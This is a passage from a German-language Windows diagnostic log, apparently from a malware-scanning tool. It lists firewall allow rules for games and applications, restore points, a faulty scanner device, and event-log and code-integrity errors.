FirewallRules: [{DD0A471E-050F-4948-8C7C-BD5A601D4DEC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5mp.exe
FirewallRules: [{2AB70A39-08B4-48C0-B688-2A783F8CEF36}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5mp.exe
FirewallRules: [{8AAE7E85-C0D1-4D16-8668-01A42CF50CAD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5mp.exe
FirewallRules: [{CE24D116-4EE8-476B-BF05-2B2F730B81D0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\call of duty modern warfare 3\iw5mp.exe
FirewallRules: [{FC40A334-4EE9-45E6-B0D3-539B191CA2E2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrialsPC\datapack\trialsFMX.exe
FirewallRules: [{D762F594-82BC-4C7A-A175-8289B2D8F8A4}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrialsPC\datapack\trialsFMX.exe
FirewallRules: [{89881A66-ABF7-4A11-ABE9-734C3BAE8F4B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\The Binding Of Isaac\Isaac.exe
FirewallRules: [{FFF8448A-3C95-4D18-9717-9B4A3EE62FD1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\The Binding Of Isaac\Isaac.exe
FirewallRules: [{716C9AA8-E64B-40D7-A3F1-B0A2E51FFE91}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{E6018619-C96A-45F7-ADBD-EB79624F94CA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna & Harvey The Breakout\Edna.exe
FirewallRules: [{39C8811C-E7E3-4083-B189-B69B8EC2D88E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Edna & Harvey The Breakout\Edna.exe
FirewallRules: [{EE85FE1B-6B0C-4F24-8186-C22082747590}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [{23143A06-CB19-4F60-86A2-0BF0252034D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [{11A53500-1DF3-43CA-8096-68B737D93580}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{A834A376-FA94-4098-AEAE-7C3DF056F14C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{2D67FEB2-5AB3-4F45-A628-3EA39360B684}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Urban Trial Freestyle\UrbanTrialFreestyle.exe
FirewallRules: [{3A840A60-1C0E-4203-8BBC-0134292636A3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Urban Trial Freestyle\UrbanTrialFreestyle.exe
FirewallRules: [{DEB005D3-50DC-417F-8BE4-E9E1E89DCB77}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Neighbours from Hell 2\bin\game.exe
FirewallRules: [{7E994B3E-2F83-49D0-B154-4922329A23E4}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Neighbours from Hell 2\bin\game.exe
FirewallRules: [{3A6E7C95-7E00-410B-9E99-02B759CFECE8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Takedown Red Sabre Early Access\Binaries\Win64\TakedownGame-Win64-Shipping.exe
FirewallRules: [{5EC37128-B905-4E75-BEA7-04B73677EE39}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Takedown Red Sabre Early Access\Binaries\Win64\TakedownGame-Win64-Shipping.exe
FirewallRules: [{A3A3882C-2B98-4665-8742-A2951B972E93}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Duke Nukem 3D\bin\dosbox\dosbox.exe
FirewallRules: [{F456BD3C-11CB-43E8-A1C1-C7D35ED3A3CF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Duke Nukem 3D\bin\dosbox\dosbox.exe
FirewallRules: [{2B6329C1-A36D-4201-9424-A46BC79988C1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Shadow Warrior Classic\bin\sw.exe
FirewallRules: [{B15AEAB2-BBEF-4605-A7EB-DBF533CE0895}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Shadow Warrior Classic\bin\sw.exe
FirewallRules: [{27FD01BE-78F2-41BB-8B6F-9AB645F98CE7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Shadow Warrior Classic\bin\dosbox\DOSBox.exe
FirewallRules: [{26C8F38E-2140-40CA-8798-EA784A1707E3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Shadow Warrior Classic\bin\dosbox\DOSBox.exe
FirewallRules: [{1566ABC1-1DF8-4FB8-A13D-B26009F6093F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Source SDK Base\hl2.exe
FirewallRules: [{D9BFE12C-3C56-42B8-9974-7164FC60D0A8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Source SDK Base\hl2.exe
FirewallRules: [{F983A116-62BF-4E49-8F9D-A5E56842D105}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Source SDK Base 2007\hl2.exe
FirewallRules: [{A0F9CC30-A786-4E40-A209-F00B957D2112}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Source SDK Base 2007\hl2.exe
FirewallRules: [{5A6805E9-CE98-4565-9CB3-D46767EEED78}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Alan Wake\AlanWake.exe
FirewallRules: [{F5D1DFE2-659F-48E5-A902-20E6A63E5476}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Alan Wake\AlanWake.exe
FirewallRules: [{1A5DAFCA-E564-40B0-B47F-7C74A76981ED}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{CC450D1E-E880-456B-BE7E-C616F1875C08}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{3C0349F6-CE64-4C70-B787-D07E8A7525FD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{C7C63FD1-42E5-44BC-8F2A-54DF88829F7C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Arma 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{EA090406-D5EC-4EA6-A0E3-45B8E8F2E63C}] => (Allow) C:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{28491FA2-5826-4205-8519-D9138A18FA98}] => (Allow) C:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{FC5D2749-4770-41B7-BA38-9EA26C688EE4}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{0465E4BF-A596-4A7E-94F2-024BCD8D7374}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{38103390-D039-4058-A406-7D9B78DF9EE7}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{1A287AD6-91D1-49CC-97E9-E9E323CEF932}] => (Allow) C:\Program Files (x86)\Wyse\PocketCloud\PocketCloudDesktopApp.exe
FirewallRules: [{88EBA6ED-0C2E-4B17-8DF1-6C06922B2A09}] => (Allow) C:\Users\VadimSch\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{AB80A67E-653A-4CA4-BDCB-974F1980C2AA}] => (Allow) C:\Users\VadimSch\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{739BF416-24D9-48D6-94BC-AACE859A4124}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Afterfall InSanity\Binaries\Win32\InSanity-Win32-Shipping.exe
FirewallRules: [{31502CC5-5B5F-49C4-B8E4-C1719124ECD3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Afterfall InSanity\Binaries\Win32\InSanity-Win32-Shipping.exe
FirewallRules: [{E867555F-6C71-414A-B61C-C3C7582A02C8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{7469CF80-56A0-4822-BAA4-7A71FAFCDFCB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{8C45B67F-DE93-4016-9004-C110B9C20A5E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\EvolveBeta\Bin64_SteamRetail\StaticLauncher64.exe
FirewallRules: [{31337951-A329-447B-A79C-0B76E26B17E8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\EvolveBeta\Bin64_SteamRetail\StaticLauncher64.exe
FirewallRules: [{25A31984-810E-4375-9DEC-B6A9A8A95AC8}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{B6E0C0F9-9599-4860-9C5C-CD3C5C5F587C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{C851B577-9A55-40E5-90D2-AD52CF32AF45}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{CBE8411A-4E34-4301-822A-088188A078B0}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6FAA83B3-A9C1-475F-801F-93FBCAD428D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Card City Nights\ccn.exe
FirewallRules: [{47024724-8EB0-46A4-B438-B45DD4281AAC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Card City Nights\ccn.exe
FirewallRules: [{E1BAAF20-13D8-4C31-A286-87798AF5010A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Advanced Warfare\s1_mp64_ship.exe
FirewallRules: [{B6EF2DF8-DFBF-4D46-A2BC-7B1A5A489443}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Advanced Warfare\s1_mp64_ship.exe
FirewallRules: [{0A6407AC-BC0F-4971-AD84-BCAF25ECC0CD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\System\Launcher.exe
FirewallRules: [{FCA77D2B-2E29-4397-9518-0DCA4ECF06EB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\System\Launcher.exe
FirewallRules: [{41DC8049-B715-4972-AF81-9A96EF6493BC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6sp64_ship.exe
FirewallRules: [{3F29DD43-9916-4A6F-BD50-9C502068E0DB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Ghosts\iw6sp64_ship.exe
FirewallRules: [{26358D82-4C3B-4A01-BFF5-5BB3CD1DAEFA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{1F33FFD2-220A-4FA0-A188-AA0D6833981E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{6DDBE067-EEBC-4842-AA2D-481E79191FFB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{504E1B19-66E9-4CF0-AD14-3C7197085047}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{850CA662-592E-4387-84CE-46EBD747B1DD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zeno Clash 2\Binaries\Win32\ZC2.exe
FirewallRules: [{E7CC22A1-5B16-4BA1-A3E1-D5DE7869E499}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zeno Clash 2\Binaries\Win32\ZC2.exe
FirewallRules: [{3D174C70-71F1-493A-A282-9E1FDBA1B4AE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Batman Arkham Asylum GOTY\Binaries\BmLauncher.exe
FirewallRules: [{014BDFEF-7792-4238-9514-DF0C3A7F551C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Batman Arkham Asylum GOTY\Binaries\BmLauncher.exe
FirewallRules: [{B6887B31-69E4-440B-B57D-2E81DB3063D3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Advanced Warfare\s1_sp64_ship.exe
FirewallRules: [{257A4DA1-394D-44F7-9D93-D3A9610849E5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Advanced Warfare\s1_sp64_ship.exe
FirewallRules: [{D5A7E960-51EC-43C9-8A17-7C91F594C6E9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{028E4765-9DB4-4905-825E-CCC4CE4C9D75}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{63826D0E-161D-4B43-904C-CB9412307944}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ibbandobb\ibbobb.exe
FirewallRules: [{F71AE321-37F5-41CD-B3E9-CC2598B65A5A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ibbandobb\ibbobb.exe
FirewallRules: [{4D0840CF-5173-44FF-B76B-53BF66CCAE01}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Waveform\Waveform.exe
FirewallRules: [{4401232E-0283-445B-A2C1-D4E70E591070}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Waveform\Waveform.exe
FirewallRules: [{E1235AA1-2B7D-4F41-975C-81636460FC88}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops III Beta\BlackOps3.exe
FirewallRules: [{05C5E838-0DD5-4EAA-AB80-E9AEB23E3EE3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops III Beta\BlackOps3.exe
FirewallRules: [{A7671B41-E20B-4952-AF3C-76B02DD5C6C4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CCEDFB17-E23F-43A7-8FEB-E368952FF8DE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{72E11B31-9DFD-4CED-B1AA-205B450ADF04}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{1B2B3EC5-8A21-4144-90E3-7EA8216935C5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D3F530A7-4BB2-42C2-8ECD-D74DD8834B1A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A5CE9891-C15B-485F-B104-82027B39301A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{730D7397-B1B3-43CA-8A60-A5D87534EB6C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{47E818F4-4A48-4500-A3F5-3A4D58218159}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{B48B513C-98EF-4FCA-9BF7-BE8E2A7129A0}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{56C106B0-C984-48B5-9CCD-7843B81065BB}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\47.0.2526.18\remoting_host.exe
FirewallRules: [{2DD7D0CD-EBE5-4EE5-9F0D-06C29616FD92}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops III\BlackOps3.exe
FirewallRules: [{71F5CCF6-C3B3-43D6-8041-8FBD2B989710}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Black Ops III\BlackOps3.exe
FirewallRules: [{9FAECAC9-DCD4-4011-8018-9275213A18F9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Ampu-Tea\AmpuTea.exe
FirewallRules: [{6114098E-93E2-408E-80D3-E0A59DEA7008}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Ampu-Tea\AmpuTea.exe
FirewallRules: [{BB4C9DF8-871A-48FA-BC0C-EC333F33A222}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 2\CoD2SP_s.exe
FirewallRules: [{900EBC7A-705B-41D4-B675-FCD2E84B42FC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 2\CoD2SP_s.exe
FirewallRules: [{1BE43120-6768-4766-8088-D4D6F1500C62}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 2\CoD2MP_s.exe
FirewallRules: [{111E84A4-D9CC-4DD8-9B5C-C1A7009A3AEA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 2\CoD2MP_s.exe
FirewallRules: [{4834C356-59B1-4013-8973-465599DAE81E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 4\iw3sp.exe
FirewallRules: [{F25C80A3-B2E2-43D2-91DC-8982EC5D5EF8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 4\iw3sp.exe
FirewallRules: [{88D6980F-23FD-44C4-8428-A4C1526D511B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 4\iw3mp.exe
FirewallRules: [{78464E5F-93B8-4B2B-9FC8-1C303AFCF10B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty 4\iw3mp.exe
FirewallRules: [{2BF5F42F-6619-4354-8FAA-C8AF71E53247}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{22B1D8A3-A567-4830-812D-6FD7C0F85139}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{99E1089A-0EBD-4096-B2C5-770AB3AE8767}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{57882F31-520C-4AFC-90D3-2F61692004DE}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{59F60BEC-9036-42F5-AAD8-EAD9CF4B9AAA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dino D-Day\dinodday.exe
FirewallRules: [{5171EAFB-2F0F-47AE-B8B3-271BB34F9A58}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dino D-Day\dinodday.exe
FirewallRules: [{6ADE1A20-86FC-49A1-9729-5A116468175F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{863C9D0D-FFC0-4867-8911-67DE175912CA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{1C12183D-556C-42EB-85B4-C446105E1D94}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{B457A37D-DFDC-454D-AE07-7B1316D94C2A}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{798567A1-C4B0-4E56-92DC-230E80F3A7D3}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{47F4D8F1-6217-4DA6-AEC9-622CF6D92BFC}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{8F28FC50-40FF-4B12-8D38-4FCB5B63D16D}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
FirewallRules: [{3F80CECF-3EF6-4AEA-9632-AE0759FC24B7}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe

==================== Wiederherstellungspunkte =========================

02-01-2016 13:20:53 Geplanter Prüfpunkt
11-01-2016 13:24:18 Removed PlayReady PC Runtime amd64

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Lexmark X422
Description: Lexmark X422
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Lexmark
Service: usbscan
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (01/11/2016 10:03:05 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"1".
Die abhängige Assemblierung "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 06:33:58 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Ein kritischer Systemprozess C:\Windows\system32\lsass.exe ist fehlgeschlagen mit den Statuscode 1. Der Computer muss neu gestartet werden.

Error: (01/11/2016 06:33:14 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Ein kritischer Systemprozess C:\Windows\system32\lsm.exe ist fehlgeschlagen mit den Statuscode 1. Der Computer muss neu gestartet werden.

Error: (01/11/2016 06:20:35 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"1".
Die abhängige Assemblierung "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 06:20:35 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"1".
Die abhängige Assemblierung "47.0.2526.106,language="&#x2a;",type="win32",version="47.0.2526.106"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 05:47:26 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"1".
Die abhängige Assemblierung "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 05:47:26 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"1".
Die abhängige Assemblierung "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 05:47:26 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"1".
Die abhängige Assemblierung "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 05:47:26 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"1".
Die abhängige Assemblierung "Microsoft.VC90.CRT,processorArchitecture="x86",type="win32",version="9.0.30729.1"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/11/2016 05:41:43 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"1".
Die abhängige Assemblierung "Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".


Systemfehler:
=============
Error: (01/11/2016 10:02:56 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "DEXOTEK-PC",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{1ACD5454-84FF-4F6D-BF22-E2D07F413576}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (01/11/2016 09:39:49 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "DEXOTEK-PC",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{1ACD5454-84FF-4F6D-BF22-E2D07F413576}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (01/11/2016 09:27:51 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "DEXOTEK-PC",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{1ACD5454-84FF-4F6D-BF22-E2D07F413576}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (01/11/2016 09:25:04 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen:
cdrom

Error: (01/11/2016 09:24:59 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst GS Supporter erreicht.

Error: (01/11/2016 09:24:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "sbapifs" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2

Error: (01/11/2016 06:54:51 PM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: 0

Error: (01/11/2016 06:38:06 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen:
cdrom

Error: (01/11/2016 06:37:20 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "LogMeIn Hamachi Tunneling Engine" wurde aufgrund folgenden Fehlers nicht gestartet:
%%1053

Error: (01/11/2016 06:37:20 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst LogMeIn Hamachi Tunneling Engine erreicht.


CodeIntegrity:
===================================
  Date: 2015-07-28 12:41:03.342
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_47662a2706182d6f\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.338
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_47662a2706182d6f\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.334
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_47662a2706182d6f\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.330
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_47662a2706182d6f\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.200
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_a384c5aabe759ea5\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.192
